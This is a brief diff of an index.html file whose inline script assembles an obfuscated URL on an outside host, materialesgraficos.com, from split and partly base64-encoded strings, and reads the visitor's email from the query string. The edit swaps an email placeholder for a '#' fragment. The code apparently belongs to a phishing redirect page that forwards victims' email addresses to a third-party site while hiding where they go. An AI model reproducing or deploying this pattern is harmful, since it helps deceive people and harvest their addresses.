--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
         (function() {
             var part1 = "https://materialesgraficos.com/i/?bGFuZz1lbiZzdj1nZ";
             var part2 = "W5lcmFsJnJib";
-            var part3 = "3g9c3VuYmFpdGY=###EMAIL##";
+            var part3 = "3g9c3VuYmFpdGY=#";
 
             // Function to get the email from the query string
             function getQueryParameter(param) {
